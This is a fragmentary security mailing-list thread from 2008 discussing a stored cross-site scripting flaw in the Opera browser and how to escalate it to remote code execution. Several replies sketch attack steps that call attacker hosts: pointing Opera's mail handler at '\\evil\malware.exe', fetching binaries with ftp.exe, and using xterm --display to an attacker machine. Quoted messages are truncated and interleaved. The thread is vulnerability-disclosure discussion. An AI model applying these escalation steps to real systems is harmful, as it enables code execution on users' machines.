Good job Aviv :)
that's exactly what I intended when I said:
"..
On linux/Macos probably some program execution could be done using xterm
--display at.tack.er in place of telnet program.
Also maybe under windows some \\att.tack.er\program.exe ?
.."
Roberto, for the q=Xss I found, just use the fo
document.body.appendChild is the way.
Cheers,
Roberto
From: avivra [mailto:[EMAIL PROTECTED]
Sent: Thursday, 23 October 2008 12:52 p.m.
To: 'Stefano Di Paola'; Roberto Suggi; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting
Hi,
Just foun
Hi,
Just found a way to use Stefano's opera:config idea to execute code from
remote.
Instead of changing the HTTP Proxy, an attacker can change the default
external mail application to "\\evil\malware.exe ", or to local commands
(e.g. ftp.exe which can be used to download malicious binaries fr
-Original Message-
From: Stefano Di Paola [mailto:[EMAIL PROTECTED]
Sent: Thursday, 23 October 2008 5:41 a.m.
To: Roberto Suggi
Cc: kuza55; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability
>Hi guys
>I'm not a
iginal Message-
> From: kuza55 [mailto:[EMAIL PROTECTED]
> Sent: Thursday, 23 October 2008 1:25 a.m.
> To: Roberto Suggi
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability
>
> >Is there any potential fo
-Original Message-
From: kuza55 [mailto:[EMAIL PROTECTED]
Sent: Thursday, 23 October 2008 1:25 a.m.
To: Roberto Suggi
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability
>Is there any potential for code execution h
Is there any potential for code execution here similar to XSS bugs in
Firefox's chrome:// context or in IE's Local Zone?
Also, you have a PoC which extracts document.cookie; which cookie does
this acquire? From my understanding of this advisory the xss is
rendered in opera:historysearch rather tha
==
=
= Opera Stored Cross Site Scripting Vulnerability
=
= Vendor Website:
= http://www.opera.com
=
= Affected Version:
= -- All desktop versions
=
= Public disclosure on 22nd October 2008
=
==